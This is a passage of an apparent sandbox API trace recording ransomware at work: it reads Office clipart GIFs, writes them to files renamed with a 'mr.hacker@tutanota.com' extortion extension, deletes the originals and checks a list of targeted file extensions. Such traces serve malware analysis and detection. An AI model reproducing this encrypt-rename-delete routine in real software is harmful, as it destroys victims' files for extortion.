hTemplateFile=0x0) returned 0x1b4 [0053.200] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.200] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.200] GetLastError () returned 0x0 [0053.200] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x2e73, lpOverlapped=0x0) returned 1 [0053.202] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x2e80, lpOverlapped=0x0) returned 1 [0053.203] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.203] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.203] SetEndOfFile (hFile=0x1a0) returned 1 [0053.203] CloseHandle (hObject=0x1a0) returned 1 [0053.204] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.204] SetEndOfFile (hFile=0x1b4) returned 1 [0053.204] CloseHandle (hObject=0x1b4) returned 1 [0053.204] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.205] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00057_.gif")) returned 1 [0053.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.205] lstrlenW (lpString=".doc") returned 4 [0053.205] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.205] lstrlenW (lpString=".docx") returned 5 [0053.205] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.205] lstrlenW (lpString=".pdf") returned 4 [0053.205] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.205] lstrlenW (lpString=".xls") returned 4 [0053.205] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.205] lstrlenW (lpString=".xlsx") returned 5 [0053.205] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.205] lstrlenW (lpString=".ppt") returned 4 [0053.205] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.205] lstrlenW (lpString=".zip") returned 4 [0053.205] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.205] lstrlenW (lpString=".rar") returned 4 [0053.205] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.206] lstrlenW (lpString=".bz2") returned 4 [0053.206] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.206] lstrlenW (lpString=".7z") returned 3 [0053.206] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.206] lstrlenW (lpString=".dbf") returned 4 [0053.206] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.206] lstrlenW (lpString=".1cd") returned 4 [0053.206] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.206] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 63 [0053.206] lstrlenW (lpString=".jpg") returned 4 [0053.206] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.206] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=517) returned 1 [0053.206] CloseHandle (hObject=0x1b4) returned 1 [0053.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif")) returned 0x20 [0053.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.207] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.207] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.207] GetLastError () returned 0x0 [0053.207] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x205, lpOverlapped=0x0) returned 1 [0053.208] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x210, lpOverlapped=0x0) returned 1 [0053.209] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.209] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.209] SetEndOfFile (hFile=0x1a0) returned 1 [0053.209] CloseHandle (hObject=0x1a0) returned 1 [0053.209] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.209] SetEndOfFile (hFile=0x1b4) returned 1 [0053.210] CloseHandle (hObject=0x1b4) returned 1 [0053.210] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.210] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00090_.gif")) returned 1 [0053.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.212] lstrlenW (lpString=".doc") returned 4 [0053.212] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.212] lstrlenW (lpString=".docx") returned 5 [0053.212] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.212] lstrlenW (lpString=".pdf") returned 4 [0053.212] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.212] lstrlenW (lpString=".xls") returned 4 [0053.212] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.212] lstrlenW (lpString=".xlsx") returned 5 [0053.212] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.212] lstrlenW (lpString=".ppt") returned 4 [0053.212] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.212] lstrlenW (lpString=".zip") returned 4 [0053.212] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.212] lstrlenW (lpString=".rar") returned 4 [0053.212] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.212] lstrlenW (lpString=".bz2") returned 4 [0053.212] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.212] lstrlenW (lpString=".7z") returned 3 [0053.212] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.212] lstrlenW (lpString=".dbf") returned 4 [0053.212] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.212] lstrlenW (lpString=".1cd") returned 4 [0053.213] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 63 [0053.213] lstrlenW (lpString=".jpg") returned 4 [0053.213] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.213] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=502) returned 1 [0053.213] CloseHandle (hObject=0x1b4) returned 1 [0053.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif")) returned 0x20 [0053.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.213] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.213] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.214] GetLastError () returned 0x0 [0053.214] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x1f6, lpOverlapped=0x0) returned 1 [0053.214] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x200, lpOverlapped=0x0) returned 1 [0053.215] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.215] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.215] SetEndOfFile (hFile=0x1a0) returned 1 [0053.216] CloseHandle (hObject=0x1a0) returned 1 [0053.216] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.216] SetEndOfFile (hFile=0x1b4) returned 1 [0053.216] CloseHandle (hObject=0x1b4) returned 1 [0053.217] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.217] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00092_.gif")) returned 1 [0053.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.217] lstrlenW (lpString=".doc") returned 4 [0053.217] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.217] lstrlenW (lpString=".docx") returned 5 [0053.217] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.217] lstrlenW (lpString=".pdf") returned 4 [0053.217] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.217] lstrlenW (lpString=".xls") returned 4 [0053.217] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.217] lstrlenW (lpString=".xlsx") returned 5 [0053.217] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.217] lstrlenW (lpString=".ppt") returned 4 [0053.217] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.217] lstrlenW (lpString=".zip") returned 4 [0053.217] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.217] lstrlenW (lpString=".rar") returned 4 [0053.217] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.218] lstrlenW (lpString=".bz2") returned 4 [0053.218] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.218] lstrlenW (lpString=".7z") returned 3 [0053.218] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.218] lstrlenW (lpString=".dbf") returned 4 [0053.218] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.218] lstrlenW (lpString=".1cd") returned 4 [0053.218] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00092_.GIF") returned 63 [0053.218] lstrlenW (lpString=".jpg") returned 4 [0053.218] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.219] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=12702) returned 1 [0053.219] CloseHandle (hObject=0x1b4) returned 1 [0053.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif")) returned 0x20 [0053.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.219] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.219] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.219] GetLastError () returned 0x0 [0053.219] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x319e, lpOverlapped=0x0) returned 1 [0053.221] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x31a0, lpOverlapped=0x0) returned 1 [0053.222] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.222] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.222] SetEndOfFile (hFile=0x1a0) returned 1 [0053.222] CloseHandle (hObject=0x1a0) returned 1 [0053.222] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.222] SetEndOfFile (hFile=0x1b4) returned 1 [0053.223] CloseHandle (hObject=0x1b4) returned 1 [0053.223] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.223] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00103_.gif")) returned 1 [0053.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0053.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0053.224] lstrlenW (lpString=".doc") returned 4 [0053.224] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.224] lstrlenW (lpString=".docx") returned 5 [0053.224] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.224] lstrlenW (lpString=".pdf") returned 4 [0053.224] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.224] lstrlenW (lpString=".xls") returned 4 [0053.224] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.224] lstrlenW (lpString=".xlsx") returned 5 [0053.224] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.224] lstrlenW (lpString=".ppt") returned 4 [0053.224] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0053.224] lstrlenW (lpString=".zip") returned 4 [0053.224] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.224] lstrlenW (lpString=".rar") returned 4 [0053.225] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.225] lstrlenW (lpString=".bz2") returned 4 [0053.225] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.225] lstrlenW (lpString=".7z") returned 3 [0053.225] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0053.225] lstrlenW (lpString=".dbf") returned 4 [0053.225] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0053.225] lstrlenW (lpString=".1cd") returned 4 [0053.225] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 63 [0053.225] lstrlenW (lpString=".jpg") returned 4 [0053.225] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.226] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3484) returned 1 [0053.226] CloseHandle (hObject=0x1b4) returned 1 [0053.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif")) returned 0x20 [0053.226] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.226] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.226] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.229] GetLastError () returned 0x0 [0053.229] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xd9c, lpOverlapped=0x0) returned 1 [0053.230] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xda0, lpOverlapped=0x0) returned 1 [0053.231] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.231] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.231] SetEndOfFile (hFile=0x1a0) returned 1 [0053.231] CloseHandle (hObject=0x1a0) returned 1 [0053.232] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.232] SetEndOfFile (hFile=0x1b4) returned 1 [0053.232] CloseHandle (hObject=0x1b4) returned 1 [0053.232] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.233] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00120_.gif")) returned 1 [0053.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0053.233] lstrlenW (lpString="C:\\Program Files\\Microsoft 